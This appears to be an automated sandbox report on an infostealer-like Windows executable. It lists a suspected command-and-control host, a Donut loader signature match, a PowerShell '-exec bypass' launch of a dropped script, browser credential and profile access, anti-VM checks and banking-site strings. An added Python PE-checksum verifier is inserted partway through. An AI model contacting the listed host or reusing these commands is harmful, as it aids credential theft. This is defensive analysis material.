#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085349574.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.000000000367C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000085C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085439303.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.0000000000834000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2224467705.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api2
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1760402571.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api6Ic=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/d
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/n)6
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/r
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758494799.000000000365A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/z
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top:443/api
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top:443/apitps://traveladdicts.top:443/api
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

              System Summary

              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_0083C4E0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Static PE information: invalid certificate
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000000.1363978866.000000000046A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: tl_bench_cd.exe vs #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1488952432.0000000002961000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename: tl_bench_cd.exe vs #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Binary or memory string: OriginalFilename: tl_bench_cd.exe vs #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/4@4/2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2808:120:WilError_03
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File created: C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631463640.0000000003606000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631741717.00000000035EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | String found in binary or memory: /Address family not supported by protocol family
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File read: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: unknown | Process created: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe"
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Static file information: File size 1730416 > 1048576
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x136e00
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Static PE information: real checksum: 0x23fb8c3 should be: 0x1b5ef5
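The checksum row above is the kind of static finding worth reproducing yourself before trusting a sandbox verdict: the CheckSum field in IMAGE_OPTIONAL_HEADER is a ones'-complement sum of the whole file image (skipping the field itself) plus the file length, so a non-zero value that does not match the recomputed one means the header was edited after linking or the file was packed or had an overlay appended. The code below is an added example, not part of the Joe Sandbox report or the sample; it recomputes the checksum and classifies the result. The stub built by build_stub_pe is a constructed, non-loadable blob that only exercises the arithmetic; on a real file pass the full file bytes to verify_checksum.

```python
import struct


def pe_checksum(data: bytes) -> int:
    """Recompute the PE image checksum over a whole file image.

    Same arithmetic as imagehlp's CheckSumMappedFile: a ones'-complement sum of
    16-bit little-endian words (end-around carry), skipping the stored CheckSum
    dword, then folded to 16 bits and added to the file length.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ magic")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_NT_HEADERS: 4-byte signature + 20-byte file header + CheckSum at
    # offset 0x40 inside the optional header = 0x58 from the signature.
    checksum_off = e_lfanew + 0x58

    total = 0
    for off in range(0, len(data) - 1, 2):
        if checksum_off <= off < checksum_off + 4:
            continue  # the field being computed never contributes to itself
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if len(data) % 2:  # an odd trailing byte is summed as a word on its own
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def verify_checksum(data: bytes) -> dict:
    """Compare the stored CheckSum with the recomputed one and give a triage verdict."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    stored = struct.unpack_from("<I", data, e_lfanew + 0x58)[0]
    computed = pe_checksum(data)
    if stored == 0:
        verdict = "unset"      # linker never filled it in; common for unsigned builds, weak on its own
    elif stored == computed:
        verdict = "ok"
    else:
        verdict = "mismatch"   # edited after link, packed, or overlay appended: what the report flags
    return {"stored": stored, "computed": computed, "verdict": verdict}


def build_stub_pe(stored_checksum: int, size: int = 0xA0) -> bytes:
    """Constructed test input: MZ magic, e_lfanew, PE signature and a CheckSum
    field, everything else zero. Not a loadable image; it exists so the
    arithmetic can be checked by hand (words 0x5A4D + 0x0040 + 0x4550 = 0x9FDD,
    plus 0xA0 bytes of length = 0xA07D)."""
    img = bytearray(size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)           # e_lfanew -> 0x40
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", img, 0x40 + 0x58, stored_checksum)
    return bytes(img)


if __name__ == "__main__":
    # A stored value that does not match the image, as in the report's row.
    print(verify_checksum(build_stub_pe(0x23FB8C3)))
```

Because the field is excluded from its own sum, writing any value into it leaves the recomputed checksum unchanged; only the verdict moves between "unset", "ok" and "mismatch". Treat "mismatch" as a packing or tampering hint to correlate with the other static rows (oversized .rsrc, file size), not as a conviction by itself.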
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_0088098D push ds; iretd 0_3_008809C2
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_0087C8A3 push 9BE6DF78h; iretd 0_3_0087C80B
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_0087C7D5 push 9BE6DF78h; iretd 0_3_0087C80B
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_00887A1A push edx; iretd 0_3_00887A1B
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_0087C844 push 9BE6DF78h; iretd 0_3_0087C80B
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_0083CF68 pushad ; iretd 0_3_0083CF69 (2 identical entries)
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Code function: 0_3_008605ED push esi; retf 0_3_008605F3
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (74 identical entries)

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2223
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe TID: 7908 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5732 | Thread sleep count: 2223 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156 | Thread sleep count: 111 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696497155j
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696497155
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696497155o
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000830000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.0000000000832000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWTy
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758950810.0000000003680000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
